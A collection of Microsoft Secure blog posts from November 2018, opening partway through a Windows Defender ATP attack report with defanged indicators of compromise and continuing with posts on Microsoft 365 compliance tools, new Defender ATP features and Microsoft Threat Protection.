In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved.
Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.


The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.



Hadar Feldman and Yarden Albeck
Windows Defender ATP team



Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138 [.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How to help maintain security compliance

November 26th, 2018 No comments

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know whats happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing youll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, youll need to decide on your policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendationssuch as retention and deletion policiesthroughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, the Compliance Manager provides you with step-by-step guidance of how to implement controls to enhance your compliance posture and keep you updated with the current compliance landscape. In addition, built-in collaboration tools to help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the datafor example, a label of General means the file doesnt contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users dont have privileges by default. When permissions are provided, its at the bare minimum with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received all activities are logged and auditable. Its the same principle that defines how Microsoft gives access to its datacenters and reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.

More blog posts from the deploying intelligent security scenario series:

Other blog posts from the security deployment series:

The post How to help maintain security compliance appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

What’s new in Windows Defender ATP

November 15th, 2018 No comments

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today Im excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATPs unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Lets look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion and prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are new, super-fast delivery method for protection knowledge. In the event of an outbreak, Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise machines to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. Theres no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our WDATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

Weve also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating systems built-in security features. Weve done this by putting Windows Defender ATPs antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with machines involved and the corresponding automated investigations, presenting all collected evidences and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlated malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while weve had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides technical description and data about a threat, and answer the key question, Does WDATP detect this threat?. It also provides recommended actions to contain and prevent specific threats, as well as increase organizational resilience.

But we dont stop there. We also provide an assessment of the impact of threats on your environment (Am I hit?), as well as show a view of how many machines were protected (Were you able to stop this?) and how may are exposed to the threat because they are not up-to-date or are misconfigured (Am I exposed?).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advance hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoints signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft and the insightful feedback from you, our customers, who we built these solutions for. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesnt stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.



Moti Gindi
General Manager, Windows Cyber Defense




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

The evolution of Microsoft Threat Protection, November update

November 13th, 2018 No comments

At Ignite 2018, we announced Microsoft Threat Protection, a comprehensive, integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and, infrastructure (Figure 1).

The foundation of the solution is the Microsoft Intelligent Security Graph, which correlates 6.5 trillion signals daily from email alone and enables:

  • Powerful machine learning developed by Microsofts 3500 in-house security specialists
  • Automation capabilities for enhanced hunting, investigation, and remediationhelping reduce burden on IT teams
  • Seamless integration between disparate services

Figure 1: Microsoft Threat Protection provides an integrated solution securing the modern workplace

Today, we revisit some of the solution capabilities announced at Ignite and provide updates on significant enhancements made since September. Engineers across teams at Microsoft are collaborating to unlock the full, envisioned potential of Microsoft Threat Protection. Throughout this journey, we want to keep you updated on its development.

Services in Microsoft Threat Protection

Microsoft Threat Protection leverages the unique capabilities of different services to secure several attack vectors. Table 1 summarizes the services in the solution. As each individual service is enhanced, so too is the overall solution.

Attack vector Services

Azure Active Directory Identity Protection

Azure Advanced Threat Protection

Microsoft Cloud App Security


Windows Defender Advanced Threat Protection

Windows 10

Microsoft Intune

User data

Exchange Online Protection

Office 365 Advanced Threat Protection

Office 365 Threat Intelligence

Windows Defender Advanced Threat Protection

Microsoft Cloud App Security

Cloud apps

Exchange Online Protection

Office 365 Advanced Threat Protection

Microsoft Cloud App Security


Use one solution, Azure Security Center, to protect all your workloads, including SQL, Linux, and Windows, in the cloud and on-premises.


Table 1: Services in Microsoft Threat Protection securing the modern workplace attack vectors

Strengthening identity security

By fully integrating Azure Active Directory Identity Protection (Azure AD Identity Protection) with Azure Advanced Threat Protection (Azure ATP) (Figure 2),Microsoft Threat Protection is able to strengthen identity security.Azure AD Identity Protection uses dynamic intelligence and machine learning to automatically protect and detect against identity attacks. Azure ATP is a cloud-powered service leveraging machine learning to help detect suspicious behavior across hybrid environments from various types of advanced external and insider cyberthreats. The integration of the two enables IT teams to manage identities and perform security operations functions through a unified experience that was previously impossible. The integration allows SecOps investigations of risky users between the two products through a single pane of glass. We will start offering customers this integrated experience over the next few weeks.

Figure 2: Integrating Azure ATP with the Azure AD Identity Protection console

Enhanced security for the endpoint

Figure 3 illustrates how Microsoft Threat Protection addresses specific customer challenges.

Figure 3: Microsoft Threat Protection is built to address specific customer challenges

Automation is a powerful capability, promising greater control and shorter threat resolution times even as the digital estate expands. We recently demonstrated our focus on automation by adding automated investigation and remediation capabilities for memory-based/file-less attacks in our industry leading endpoint security service, Windows Defender Advanced Threat Protection (Windows Defender ATP). Now the service can leverage automated memory forensics to incriminate malicious memory regions and perform required in-memory remediation actions. The unique new capability enables fully automated investigations and resolution flow formemory-based attacks, going beyond simply alerting and saving security teams precious time of manual memory forensic effort.

Figure 4 shows the investigation graph of an ongoing investigation in the Windows Defender Security Center. To enable the new feature, run the October 2018 update of Windows 10 and enable the preview features. The capability was released earlier this year and can now mark your alerts as resolved automatically once automation successfully remediates the threat.

Figure 4: Investigation graph of ongoing investigation in Windows Defender Security Center

Elevating user data and cloud app security

Microsoft Threat Protection secures user data by leveraging Office 365 threat protection services, including Office 365 Advanced Threat Protection (Office 365 ATP), which provides best-in-class security in Office 365 against advanced threats to email, collaboration apps, and Office clients. We recently launched Native-Link Rendering, (Figure 5)for both the Outlook Client and the Outlook on the Web applicationenabling users to view the destination URL for links in email. This allows users to make an informed decision before clicking through. This feature was a high demand request from customers who educate users on spotting suspicious links in email and were excited to deliver on it. Office 365 ATP is the only email security service for Office 365 offering this powerful feature.

Figure 5: Native Link Rendering user experience in Office 365 ATP user

Enhancements have also been made in securing cloud apps, beginning with the integration between Microsoft Cloud App Security and Windows Defender ATP. Now, Microsoft Cloud App Security leverages signal from Windows Defender ATP monitored endpoints, enabling discovery and recovery from unsupported cloud service (shadow IT) usage. More recently, Microsoft Cloud App Security further helps reduce impact from shadow IT by providing granular visibility into Open Authentication (OAuth) application permissions that have access to Office 365, G Suite, and Salesforce data. OAuth apps are a newer attack vector often leveraged in phishing attacks, where attackers trick users into granting access to rogue applications. In the managing apps view (Figure 6), admins see a full list of both permissions granted to an OAuth app and the users granting the apps access. The permission level details help admins decide which apps users can continue to have access and which ones will have access revoked.

Figure 6: Microsoft Cloud App Security apps permission management view

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Start your trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.


The post The evolution of Microsoft Threat Protection, November update appeared first on Microsoft Secure.

Categories: Uncategorized Tags: